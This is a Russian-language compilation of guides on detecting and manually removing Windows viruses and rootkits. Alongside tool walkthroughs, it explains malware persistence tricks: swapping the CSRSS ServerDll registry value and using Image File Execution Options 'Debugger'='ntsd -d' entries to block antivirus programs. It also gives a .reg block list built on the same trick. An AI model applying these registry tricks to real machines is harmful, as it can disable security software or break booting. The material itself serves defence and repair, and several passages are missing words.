    Перезагружаюсь. Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет, поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в службах, ни в системных каталогах не появилось ничего нового. Просмотр системного журнала дает только одну наводку - системе не удалось запустить таинственную службу grande48 . Такой службы у меня быть не могло, да и по времени это событие совпало с моментом внедрения. Что еще наводит на мысль об успешном внедрении - так это отсутствие в реестре записи о службе grande48 и отсутствие второго сообщения в журнале системы об ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая недоработка вирусописателей. Хотя и несущественная, ведь большинство пользователей журнал событий не просматривают, да и на момент возникновения подозрения на заражение эта запись в журнале уже может и отсутствовать.

Определяем наличие вируса в системе.

1.     Наверняка должен быть "левый" трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось - один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п.

2.     Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Одна из наиболее популярных - Марка Руссиновича, которую можно скачать на странице раздела Windows Sysinternals сайта Microsoft. Инсталляция не требуется. Разархивируем и запускаем. Жмем "Scan". После непродолжительного сканирования видим результаты:

    Кстати, даже не вникая в содержания строк, можно сразу заметить, что имеются очень "свежие" по времени создания/модификации записи или файлы (колонка "Timestamp") . Нас в первую очередь должны заинтересовать файлы с описанием (колонка "Description" ) - "Hidden from Windows API" - скрыто от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений - это, естественно, ненормально. Два файла - grande48.sys и Yoy46.sys - это как раз то, что мы ищем. Это и есть прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала - это нормальные драйверы Windows XP. Кроме того, вирус скрывал их наличие только в папке \system32 , а их копии в \system32\dllcache остались видимыми.
    Напомню, что в Windows XP применяется специальный механизм защиты системных файлов, называемый Windows File Protection (WFP) . Задача WFP - автоматическое восстановление важных системных файлов при их удалении или замене устаревшими или неподписанными копиями. Все системные файлы Windows XP имеют цифровую подпись и перечислены в специальной базе данных, используемой WFP. Для хранения копий файлов используется папка \system32\dllcache и, отчасти, \Windows\driver cache . При удалении или замене одного из системных файлов, WFP автоматически копирует "правильную" его копию из папки \dllcache. Если указанный файл отсутствует в папке \dllcache , то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP. Попробуйте удалить vga.sys из \system32, и система тут же его восстановит, используя копию из dllcache. А ситуация, когда, при работающей системе восстановления файлов, файл драйвера есть в \dllcache и его не видно в \system32 - это тоже дополнительный признак наличия руткита в системе.

Удаляем вирус из системы.

    Осталось выполнить самое важное действие - удалить вирус. Самый простой и надежный способ - загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита.

Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню - жмем R.

Выбираем систему (если их несколько):

Вводим пароль администратора.
Список драйверов и служб можно просмотреть с помощью команды listsvc:

В самом деле, в списке присутствует Yoy46 , правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается:

Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable . Запрещаем старт Yoy46 командой:

    Водим команду EXIT и система уходит на перезагрузку.
После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его файлы и очистить реестр от его записей. Можно проделать это вручную, а можно использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения, будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря Данилова. Скачать можно отсюда - http://freedrweb.ru
    Там же можно скачать "Dr.Web LiveCD" - образ диска, который позволяет восстановить работоспособность системы, пораженной действиями вирусов, на рабочих станциях и серверах под управлением Windows\Unix, скопировать важную информацию на сменные носители либо другой компьютер, если действия вредоносных программ сделали невозможным загрузку компьютера. Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и подозрительных файлов, но и попытается вылечить зараженные объекты. Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением.iso) и записать его на CD. Будет создан загрузочный диск, загрузившись с которого, руководствуетесь простым и понятным меню.

    Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD, можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить, загрузившись в другой ОС, например, с использованием Winternals ERD Commander. Для сканирования зараженной системы необходимо указать именно ее жесткий диск (Режим "Выборочная проверка"). Сканер поможет вам найти файлы вируса, и вам останется лишь удалить связанные с ним записи из реестра.
    Поскольку вирусы научились прописываться на запуск в безопасном режиме загрузки, не мешает проверить ветку реестра:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\SafeBoot
Разделы:
Minimal - список драйверов и служб запускаемых в безопасном режиме (Safe Mode)
Network - то же, но с поддержкой сети.

Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot , появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и, естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется.

    Если у вас возникли сомнения относительно какого-либо файла, то можно воспользоваться бесплатной онлайновой антивирусной службой virustotal.com . Через специальную форму на главной странице сайта закачиваете подозрительный файл и ждете результатов. Сервисом virustotal используются консольные версии множества антивирусов для проверки вашего подозреваемого файла. Результаты выводятся на экран. Если файл является вредоносным, то с большой долей вероятности, вы сможете это определить. В какой-то степени сервис можно использовать для выбора "лучшего антивируса".
ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн - проверок компьютера, браузера, файлов...

    Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается "Диспетчер сеансов" (\SystemRoot\System32\smss.exe) , задача которого - запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services

    Информация, предназначенная для диспетчера сеансов, находится в ключе реестра

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager

Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems

То найдете значения

ServerDll=basesrv , ServerDll=winsrv . Библиотеки basesrv.dll и winsrv.dll - это "правильные" файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll:

ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv)

Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится "синим экраном смерти" (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32.

Поправить ситуацию можно так:

Загрузится в консоль восстановления (или в любой другой системе), и скопировать файл basesrv.dll из папки C:\WINDOWS\system32 в ту же папку под именем basepvllk32.dll. После чего система загрузится и можно будет вручную подправить запись в реестре.
- загрузиться с использованием Winternals ERD Commander и исправить запись в реестре на ServerDll=basesrv . Или выполнить откат системы с использованием точки восстановления.

    Еще один характерный пример. Вредоносная программ регистрируется как отладчик процесса explorer.exe, создавая в реестре запись типа:

"Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к невозможности запуска explorer.exe. В результате вы получаете пустой рабочий стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию клавиш CTRL-ALT-DEL. Выбираете "Диспетчер задач" - "Новая задача" - "Обзор" - находите и запускаете редактор реестра regedit.exe. Затем удаляете ключ
HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
и перезагружаетесь.

    В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье "Проблемы с загрузкой ОС" раздела "Windows"

    == Май 2008. ==

Дополнение

    Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок.

После удаления вируса ни один антивирус не работает.

    Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный "Стрим Антивирус". Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы "Avira Antivir Guard". Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность - вирусов, руткитов и прочей гадости (Malware) в системе нет.
    В какой-то момент попробовал запустить антивирусную утилиту AVZ . Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения анализа результатов проверки системы за счет отметки легитимных объектов цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы.
Но: исполняемый файл avz.exe не запустился! Переименовываю avz.exe в musor.exe - все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки:

Опасно - отладчик процесса "avz.exe"="ntsd-d"
Опасно - отладчик процесса "avguard.exe"="ntsd-d"
:.

Это была уже серьезная зацепка. Поиск в реестре по контексту "avz" привел к обнаружению в ветке

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

Раздела с именем avz.exe , содержащем строковый параметр с именем "Debugger" и значением .
И, как выяснилось позже, в указанной ветке присутствовал не только раздел "avz.exe", но и разделы с именами исполняемых модулей практически всех известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe - вполне легальный отладчик Windows, стандартно присутствующий во всех версиях ОС, но подобная запись в реестре приводит к невозможности запуска приложения, имя исполняемого файла которого совпадает с именем раздела???.exe.

    После удаления из реестра всех разделов, c именем???.exe и содержащих запись "Debugger" = "ntsd -d" работоспособность системы полностью восстановилась.

В результате анализа ситуации с использованием параметра "ntsd -d" для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр:

Windows Registry Editor Version 5.00

"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
:.. и т.д.

Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке \WINDOWS\, а вирус располагается где-то в другом месте - в корне диска, в папке \temp, \windows\system32\ Если вы создадите раздел с именем "Explorer.exe" - то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:\temp\winlogon.exe, а легальный модуль входа в систему C:\WINDOWS\SYSTEM32\winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD).

    Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием - не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний.

Наиболее простой и эффективный путь - загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса.

Использование Dr.Web LiveCD - самый простой и не требующий специальных знаний способ. Скачиваете iso-образ CD, записываете его на болванку, загружаетесь с CD-ROM и запускаете сканер.

Использование Winternals ERD Commander. Загружаетесь с него, подключившись к зараженной системе, и выполняете откат на контрольную точку восстановления с датой, когда заражения еще не было. Выбираете меню System Tools - System Restore . Если откат средствами ERD Commander"а выполнить невозможно, попробуйте вручную найти файлы реестра в данных контрольных точек и восстановить их в каталог Windows. Как это сделать я подробно описал в статье "Работа с реестром".

Загрузка в другой ОС и ручное удаление вируса. Самый сложный, но самый эффективный способ. В качестве другой ОС удобнее всего использовать тот же ERD Commander. Методика обнаружения и удаления вируса может быть следующей:

Переходите на диск зараженной системы и просматриваете системные каталоги на наличие исполняемых файлов и файлов драйверов с датой создания близкой к дате заражения. Перемещаете эти файлы в отдельную папку. Обратите внимание на каталоги

\Windows
\Windows\system32
\Windows\system32\drivers
\Windows\Tasks\
\RECYCLER
\System Volume Information
Каталоги пользователей \Documents And Settings\All Users и \Documents And Settings\имя пользователя

Очень удобно использовать для поиска таких файлов FAR Manager, с включенной сортировкой по дате для панели, где отображается содержимое каталога (комбинация CTRL-F5). Особое внимание стоит обратить на скрытые исполняемые файлы. Существует также эффективная и простая утилита от Nirsoft - SearchMyFiles, применение которой позволяет, в подавляющем большинстве случаев, легко обнаружить вредоносные файлы даже без использования антивируса. Способ обнаружения вредоносных файлов по времени создания (Creation time)

Подключаетесь к реестру зараженной системы и ищете в нем ссылки на имена этих файлов. Сам реестр не мешает предварительно скопировать (полностью или, по крайней мере, те части, где встречаются выше указанные ссылки). Сами ссылки удаляете или изменяете в них имена файлов на другие, например - file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.

Данный способ не требует особых знаний и в случаях, когда вирус не меняет дату модификации своих файлов (а это пока встречается очень редко) - дает положительный эффект. Даже если вирус не обнаруживается антивирусами.

Если предыдущие методики не дали результата, остается одно - ручной поиск возможных вариантов запуска вируса. В меню Administrative Tools ERD Commander"а имеются пункты:

Autoruns - информация о параметрах запуска приложений и оболочке пользователя.
Service and Driver Manager - информация о службах и драйверах системы.

- В качестве продолжения темы - как избавиться от вирусов с помощью стандартных средств операционной системы Windows Vista \ Windows 7. Использование безопасного режима с поддержкой командной строки.

Использование загрузочного диска Winternals ERD Commander - Подробная инструкция по применению диска аварийного восстановления системы, созданного на базе Microsoft Diagnostic and Recovery Toolset (MS DaRT) .

Сайт Олега Зайцева, автора AVZ. - Посвящен информационной безопасности, и в частности - применению одной из наиболее эффективных антивирусных утилит AVZ.

Восстановление системы после вирусного заражения Как восстановить работоспособность Windows после удаления вируса, повредившего некоторые настройки. Помогает в случаях, когда не запускаются программы, при подмене страниц, открываемых обозревателем, подмене домашней страницы, страницы поиска, при изменении настроек рабочего стола, невозможности запуска редактора реестра, отсутствии доступа в Интернет, недоступности некоторых сайтов и т.п.

Итак, сегодня мы поговорим с вами о том, как удалить вирус вручную с компьютера. Помимо этого, посмотрим, какие могут встречаться трояны, как они проявляют себя и откуда могут быть занесены на компьютер. Давайте же поскорее приступим к изучению нашей сегодняшней темы.

Виды вирусов

Что ж, но перед тем, как удалить вирус вручную с компьютера, стоит поговорить с вами о том, какая зараза вообще встречается на компьютере. Ведь в большинстве случаев именно от этого зависит то, каким образом следует проводить лечение. Так что, давайте начнем.

Первый вирус - это троян. Из себя представляет вредоносный файл, который "селится" в операционной системе, да еще и вредит ей. Например, повреждает или уничтожает важные документы. Сейчас их очень много.

Второй довольно распространенный вид вируса - это разнообразные шифровальщики. Это такие файлы, которые попадают в систему и блокируют ее. Но не разрушая, а всего лишь зашифровывая документы. В конце такого шифра, как правило, оставляется e-mail создателя, на который надо перевести энную сумму денег ради возврата документов в первоначальный вид.

Третий вирус, который можно подцепить - это, конечно же, разнообразные надстройки браузера, или спам. Как правило, они очень сильно да еще и мешают работе в интернете. Это происходит из-за того, что у пользователя может смениться стартовая страница, плюс ко всему, в браузере всюду будут расположены рекламные баннеры. Когда пользователи видят эту картину, то они задумываются, как найти вирусы в компьютере вручную, а потом убрать их. Сейчас мы попытаемся разобраться с этим.

Признаки заражения

Итак, перед тем как найти вирусы вручную и избавиться от них раз и навсегда, давайте попробуем разобраться, что может указывать вам на наличие компьютерной заразы в системе. Ведь если вовремя обнаружить сигналы, то можно избежать повреждения большого количества файлов и потери "операционки".

Первый, наиболее явный признак - это не что иное, как сообщения вашей антивирусной программы. Она будет "ругаться" на какие-то документы и файлы, выдавая вам название предполагаемого вируса. Правда, иногда антивирус так ведет себя по отношению к различным крякам и "таблеткам" к компьютерным играм. Тем не менее, без внимания это оставлять нельзя.

Второй вариант развития событий - у вас начинает "тормозить" компьютер. Именно тогда пользователи начинают активно думать, как удалить вирус вручную, особенно, если у них нет антивируса. Так что, как только вы заметили, что ваша система стала "тугодумом", начинайте бить тревогу.

Очередной вариант развития событий - на компьютере стали появляться новые программы, которые вы не устанавливали. Довольно распространенный ход среди компьютерной заразы.

Кроме того, на инфицирование компьютера может указывать еще и реклама в браузере. Смена стартовой страницы без возможности восстановления, рекламные баннеры везде и всюду - все это довольно тревожные сигналы. Так что, давайте поскорее посмотрим, как происходит с компьютера вручную.

Поиск

Что ж, первым делом стоит начать с поиска тех мест, где кроется зараза. Иногда сделать это очень трудно. Особенно, если у вас нет антивирусной программы. В общем, давайте посмотрим, что можно сделать в сложившейся ситуации.

Итак, когда вы решили самостоятельно побороть вирус, то вам придется найти папку на компьютере, в которой он хранится. Иногда зараза сама выдает себя, создав свои процессы в Откройте его (Ctrl + Alt + Del), после чего перейдите во вкладку "процессы". Теперь найдите там любую подозрительную строчку (она будет как-то странно называться, или вообще подписана иероглифами) и нажмите на кнопку "показать расположение файла". Готово, вирус найден.

Правда, не все всегда так легко и просто. Если вы думаете, как удалить вирус вручную с компьютера, то вам стоит знать и то, что компьютерная зараза зачастую хорошо скрывается. В отображении папок отметьте пункт "отображать и папки". Теперь осуществлять поиск будет значительно проще.

Помните и то, что очень часто "оседают" в папке Windows. Например, большинство троянов встречается в System32. Некоторая зараза способна "прописаться" в файл host. Излюбленные места вирусов мы знаем. Но как же избавиться от них?

Проверки

Первый вариант развития событий - это удаление заразы автоматически. Точнее, полуавтоматически. Речь идет о на наличие вирусов при помощи антивирусной программы.

Для того чтобы обеспечить себе надежную защиту данных, запаситесь хорошим антивирусом. Отлично подходит Dr.Web. Если он вам не понравился, можете испробовать еще и Nod32. Он тоже довольно хорошо справляется с задачей.

Проведите глубокую проверку. После того, как программа выдаст вам результаты, постарайтесь вылечить документы автоматически. Не получилось? Тогда сотрите их. Правда, если вы думаете, как удалить вирус вручную с компьютера, то, скорее всего, проверки антивирусом вам не помогли. Давайте посмотрим, что же еще можно сделать.

Стираем программы

Второй шаг на пути к исцелению системы - это, конечно же, удаление разнообразного контента, который вам наставил вирус. Это довольно частое явление. Так что, загляните в "панель управления", а оттуда проследуйте в "установку и удаление программ". Немного подождите, пока завершится проверка контента на компьютере.

Когда перед вами появится список программ, удалите все, чем вы не пользуетесь. Особое внимание уделите контенту, который вы не устанавливали. Или же тому, что появился "прицепом" после завершения установки какой-нибудь другой "проги". Кликните по нужной строчке правой кнопкой мышки, после чего выберите команду "удалить". Готово? Тогда можно думать дальше, как удалить вирус вручную с компьютера.

Тотальное сканирование

А теперь давайте прибегнем к некоторым службам и приемам, которые обязательно помогут нам. Если вы знаете название вируса (особенно, если вы столкнулись со спамом), то вам подойдет поиск заразы при помощи компьютерного реестра.

Для того чтобы перейти в необходимую службу, нажмите сочетание клавиш Win + R, а затем выполните команду "regedit". Посмотрите, что перед вами появится. С левой стороны окна расположены папки с длинными и непонятными названиями. Именно в них зачастую прячутся вирусы. Но мы немного упростим себе задачу по поиску. Достаточно зайти в "правку", а затем нажать на "поиск". Наберите имя вируса, после чего осуществите проверку.

После получения результатов все появившиеся строки требуется стереть. Для этого кликайте поочередно на каждую из них, после чего выбирайте необходимую команду. Все готово? Тогда перезагрузите компьютер. Теперь вы знаете, как удалить вирус вручную с компьютера.

Заражение компьютера вирусами – это не новая тема для каждого компьютерного пользователя. При загрузке операционной системы появляются различные информационные окна, некоторые программы работают некорректно, изменяется стартовая страница браузера, устанавливаются различные дополнения. Бывает и так, что компьютер вообще не включается или загружается очень долго, потом при работе тормозит.

Если у Вас присутствует хоть один из вышеперечисленных признаков, то определенно, Вы подхватили вирус. Поэтому давайте разбираться, какими способами можно удалить вирус самостоятельно с компьютера.

Использование антивирусов

Первое, что необходимо сделать – это проверить компьютер с помощью установленной антивирусной программы. У меня установлен Аваст, поэтому показываю на нем. В трее найдите соответствующий значок и кликните по нему мышкой.

Откроется основное окно программы. Теперь убедитесь, что у Вас установлена последняя версия определения вирусов: в «Настройках» зайдите на вкладку «Обновление» . Посмотрите, когда было получено последнее обновление, при необходимости нажмите на кнопку «Обновить» .

Из выпадающего списка выберите «Полное сканирование» и нажмите «Пуск» . Если у Вас установлен другой антивирусник, найдите в нем такой же пункт и включите полное сканирование компьютера.

Таким образом, мы выполним полное сканирование компьютера на вирусы. Времени этот процесс займет много – часов 11, впрочем, все зависит от того, сколько информации храниться на компьютере – чем больше ее объем, тем дольше выполняется проверка.

Когда процесс полностью завершиться, попробуйте вылечить найденные угрозы. Если этого сделать не получается, то их лучше удалить.

Будет лучше, если мы выполним проверку компьютера на вирусы еще одной антивирусной программой: например, Dr.Web CureIt или AVP Tool . Использовать для дома, но не для коммерческих целей, эти программы можно совершенно бесплатно. К тому же, они не требуют установки на компьютер – не возникнет конфликта с установленным антивирусом.

Скачать Dr.Web CureIt можно с официального сайта, перейдя по ссылке:
https://free.drweb.ru/download+cureit+free/

AVP Tool – утилита от лаборатории Kaspersky, которая лечит уже зараженный компьютер пользователя. Скачайте ее с официального сайта по ссылке:
http://www.kaspersky.ru/antivirus-removal-tool

Скачивать программы лучше именно с официального сайта, чтобы в ней были установлены последние обновления вирусной базы данных.

Чтобы выполнить проверку компьютера одной из выбранных Вами утилит, переходим в безопасный режим: при загрузке операционной системы нажимайте кнопку F8 . Теперь запустите программу и выполните полную проверку.

По завершении процесса попробуйте вылечить или удалите найденные угрозы. Обратите внимание: после удаления определенных файлов может быть нарушена работа некоторых пиратских программ.

Лечение компьютера от вирусов с помощью антивирусных программ, не дает нам 100% гарантии, что теперь он чист. Для этого потребуется сделать еще несколько действий.

Убираем непонятные программы из автозагрузки

В этом пункте нужно , или те, которыми Вы пользуетесь крайне редко. Нажмите комбинацию Win+R и в строке «Выполнить» напишите команду msconfig и нажмите «ОК» .

Откроется окно . Здесь галочками отмечены программы, которые запускаются вместе с операционной системой. Отключите запуск всех ненужных Вам программ: снимите галочки напротив них. Посмотрите на наличие в списке непонятных программ, с неясным расположением или производителем.

Когда закончите, нажмите «Применить» и «ОК» .

Если сомневаетесь, стоит ли отключать из списка определенный пункт, наведите на него мышкой в разделе «Команда» и посмотрите расположение файла. Затем найдите его через проводник и обратите внимание на дату, когда он был загружен. Если это было в те дни, когда был заражен компьютер, то можете смело снимать галочку.

Видео по теме:

Проверяем недавно установленные программы

Для этого заходим «Пуск» – «Панель управления» – «Программы и компоненты» .

В следующем окне кликаем по столбцу «Установлено» и смотрим последние установленные программы. Если среди них есть такие, которые Вы не устанавливали (непонятное, неизвестное название и содержание) – кликните по ней мышкой и нажмите «Удалить» .

Чтобы утилиты не оставляли после себя никаких следов, воспользуйтесь на ПК. Сделать это можно вручную, или с помощью специальных утилит.

Видео по теме:

Проверяем процессы в диспетчере задач

Из-за загруженности центрального процессора быстродействие компьютера может значительно снизиться. Если раньше проблем и зависаний не было, а теперь Вы с этим сталкиваетесь, то возможно это результат работы вредоносной программы.

Кликните на кнопку «Пуск» и в строке поиска введите «Диспетчер задач» , затем нажмите «Enter» .

Здесь перейдите на вкладку «Процессы» и посмотрите, чтобы в колонке «ЦП» не было сильно больших значений. Если заметили что-нибудь подозрительное, кликните по этой строке правой кнопкой мыши и выберите из контекстного меню «Открыть место хранения файла» .

Через проводник откроется место расположения файла. Посмотрите на «Дату изменения» файла. Если она совпадает с тем числом, когда Вы предположительно поймали вирус, то удалите данный файл и вернитесь обратно в «Диспетчер задач» , выделите мышкой нужную строку и нажмите «Завершить процесс» .

Удаляем временные файлы

В этом пункте мы , в которой хранятся все временные файлы. Сначала необходимо включить видимость файлов и папок. Заходим «Пуск» – «Панель управления» – «Параметры папок» .

В следующем окне переходим на вкладку «Вид» и ставим маркер напротив пункта «Показывать скрытые файлы, папки и диски» . Жмем «Применить» и «ОК» .

Ищем еще одну папку «Temp» на компьютере:

C: – Пользователи – Имя ВАШЕЙ Учетной записи – AppData – Local – Temp

Из нее тоже удалите все файлы.

Видео по теме:

Проверяем файл hosts

Иногда вирусы могут добраться и до файла hosts . Перейдите по следующему пути:

C: – Windows – System32 – drivers – etc

Кликнете по файлу с названием «hosts» правой кнопкой мыши, выберете «Открыть» и откройте его с помощью блокнота.

Для операционной системы Windows 7 в файле должен быть написан текст, как на рисунке ниже.

Для уменьшения запросов к DNS-кешу и DNS-серверам в файле hosts также могут быть прописаны часто загружаемые Интернет-страницы. Если там Вы заметите подозрительную информацию – удалите ее.

Если же Вы зашли в нужную папку и файла hosts там не обнаружили, то возможно это из-за вируса. Включите видимость скрытых файлов и папок, как было описано выше. Затем откройте появившийся файл hosts и посмотрите, чтобы там был написан тот текст, который должен быть по умолчанию.

Если он изменен – пропишите все так, как должно быть. В том случае, если файл нельзя отредактировать, создайте новый с расширением .txt и названием hosts и пропишите весь текст, как на рисунке выше – для операционной системы Windows 7. Для других операционных систем текст отличается, поэтому поищите в Интернете.

Чистим реестр

Это нужно сделать в том случае, если Вы удалили подозрительную программу через «Программы и компоненты» , или завершили работу непонятного файла в процессах.

Для того чтобы открыть редактор реестра, нажмите сочетание Win+R . Дальше в окне «Выполнить» напишите команду regedit и нажмите «ОК» .

Теперь на вкладке «Правка» выберете «Найти» или нажмите сочетание Ctrl+F . В строку поиска введите название программы, или часть названия, которую Вы удалили через «Программы и компоненты» или «Установка и удаление программ» . В строку поиска также можно ввести название того файла, работу которого Вы завершили в процессах.

Если по названию будет найдена или ветка реестра, или параметр, его нужно будет удалить – выделите мышкой параметр или ветку реестра и нажмите Delete .

Очистка кэша браузера и удаление дополнений

Если вирус связан с браузером, то сначала проверим, куда ведут ярлыки, созданные на рабочем столе. Для этого кликаем правой кнопкой мыши по ярлыку браузера и переходим в «Свойства» .

Здесь в поле «Объект» проверьте, чтобы ссылка вела на тот диск и папку, где установлен браузер. Если ссылка ведет на подозрительный файл, удалите ярлык и создайте его заново.

Чтобы очистить кэш браузера, воспользуйтесь специальной программой, например, CCleaner . Скачайте, установите и запустите ее на компьютере. Затем в разделе «Очистка» на вкладке «Приложения» выделите галочками нужные пункты, нажмите «Анализ» , потом «Очистка» .

Теперь перейдите на вкладку «Расширения» , если там будут установлены расширения, которые имеют непонятные названия, или Вы их самостоятельно не устанавливали – нажмите «Удалить» .

Создание Live CD

Это Вам пригодиться, если Ваш компьютер заблокирован вирусом: он включается, но операционная система не грузится. Как записать Live CD на флешку или диск и очистить свой компьютер, прочтите в статье, перейдя по ссылке.

Для этого Вам потребуется другой компьютер, с которого можно будет скачать образ, чистый диск или флешка. Также необходимо будет изменить приоритетность загрузки в BIOS . Статью об этом также можно прочесть, перейдя по ссылке.

без использования каких-либо программ — антивирусов

Здесь мы покажем вам, как можно самостоятельно обнаружить и затем удалить файлы, способные нанести вред вашему компьютеру, или вирусы самостоятельно (вручную) без использования каких-либо антивирусных программ.

Это несложно . Давайте начнём!

Как удалить вирус самостоятельно

Действовать необходимо на правах администратора.

Для начала надо открыть командную строку. Для этого нажмите сочетание клавиш WINDOWS + R и в появившемся окне в строке введите cmd и нажмите ОК .

Команда cmd в командной строке

Либо, нажав кнопку Пуск в нижнем левом углу экрана монитора, в строке поиска начните набирать «командная строка », а затем по найденному результату кликните правой кнопкой мышки и выберите «Запуск от имени администратора ».

Вызов командной строки через поиск

